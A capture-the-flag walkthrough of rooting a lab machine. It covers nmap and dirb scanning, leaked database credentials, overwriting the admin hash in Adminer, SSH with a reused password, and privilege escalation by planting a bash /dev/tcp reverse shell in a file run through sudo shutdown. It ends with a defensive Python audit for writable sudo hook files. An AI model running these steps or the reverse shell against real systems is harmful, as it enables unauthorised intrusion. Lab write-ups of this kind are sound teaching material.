We start by scanning the host with nmap -A -T4 -p- 192.168.1.18 -vv

We have port 80 open so we scan it with dirb http://192.168.1.18 /usr/share/dirb/wordlist/big.txt

I took a look around the results and found a login page at /mantis, but no credentials to log in with. There is another page, http://192.168.1.18/mantisbt/config/a.txt, where we can find the username, password and database name, so the next thing to do is to look for PHP pages with dirb -X. I found http://192.168.1.18/adminer.php, where we can log in with the credentials we just found:


We login and look for usernames and passwords:

Now there is no need to crack the administrator's hash, because we can simply replace it: go to any online MD5 hashing site, pick a password of your own and hash it, then put the resulting hash in here. In my case the password is pass123:

Save and we go back to the login page at http://192.168.1.18/mantisbt and login:


Wow, at this point I found nothing, so I went back to the database and kept trying to log in over SSH until I got a hit with tre@192.168.1.18; the password is his real name, Tr3@123456A!. So all we needed was to log in to the database and use his real name as the password, with no need to continue to the Mantis login page:

The user can run sudo on this machine:

So I ran the LinEnum.sh script and found this:


I edited the file and just added bash -i >& /dev/tcp/192.168.1.16/4444 0>&1

Then I ran sudo -u root /sbin/shutdown -r while listening on port 4444 on my machine:
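The privilege escalation above works because a command the user may run as root through sudo ends up executing a file that same user can edit. As an added example, not part of this write-up, here is a small defender-side audit for that pattern in Python: given a sudo-permitted command and the files it executes, it reports anything the unprivileged identity could modify or replace. The write-up does not name the file that was edited, so the paths below are constructed placeholders created in a temporary directory, and uid 65534 ("nobody") stands in for the low-privileged account.

```python
# Added example (not from the original write-up): a defender-side audit for the
# privilege-escalation pattern above -- a command permitted through sudo that
# executes a file an unprivileged user can modify.
import os
import stat
import tempfile


def writable_by(path, uid, gids):
    """Return True if a non-root process with this uid and these gids could write
    to path under plain POSIX mode bits (ACLs and capabilities are ignored)."""
    st = os.stat(path)
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def audit_sudo_command(command, hook_files, uid, gids):
    """Audit a sudo-permitted command and the files it executes.

    Returns a list of (path, reason) findings. An empty list means no file in
    the chain is editable or replaceable by the given unprivileged identity.
    """
    findings = []
    for path in (command, *hook_files):
        if not os.path.lexists(path):
            findings.append((path, "missing"))
            continue
        if writable_by(path, uid, gids):
            findings.append((path, "file writable by unprivileged user"))
        parent = os.path.dirname(path) or "."
        if writable_by(parent, uid, gids):
            # A writable directory lets the user delete and recreate the file.
            findings.append((path, "parent directory writable"))
    return findings


def demo():
    """Constructed scenario: one hook with sane permissions, one world-writable.
    The paths are placeholders; the real hook on the box is not named above."""
    # Placeholder 'nobody' identity; avoid colliding with the running user.
    unpriv_uid = 65534 if os.getuid() != 65534 else 65533
    unpriv_gids = {unpriv_uid}
    with tempfile.TemporaryDirectory() as root:
        os.chmod(root, 0o755)  # directory itself must not be world-writable
        cmd = os.path.join(root, "shutdown")
        safe_hook = os.path.join(root, "safe-hook.sh")
        bad_hook = os.path.join(root, "world-writable-hook.sh")
        for p in (cmd, safe_hook, bad_hook):
            with open(p, "w") as f:
                f.write("#!/bin/sh\nexit 0\n")
        os.chmod(cmd, 0o755)
        os.chmod(safe_hook, 0o755)
        os.chmod(bad_hook, 0o777)  # the misconfiguration being detected
        return {
            "safe": audit_sudo_command(cmd, [safe_hook], unpriv_uid, unpriv_gids),
            "vulnerable": audit_sudo_command(cmd, [bad_hook], unpriv_uid, unpriv_gids),
        }


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings or "no findings")
```

Run it as is and the "vulnerable" scenario flags the world-writable hook while the "safe" one is clean; on a real host you would point audit_sudo_command at the command from the sudoers entry and the scripts it runs, and treat any finding as a root-equivalent path to fix (root ownership, mode 0755 or tighter, non-writable parent directory).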

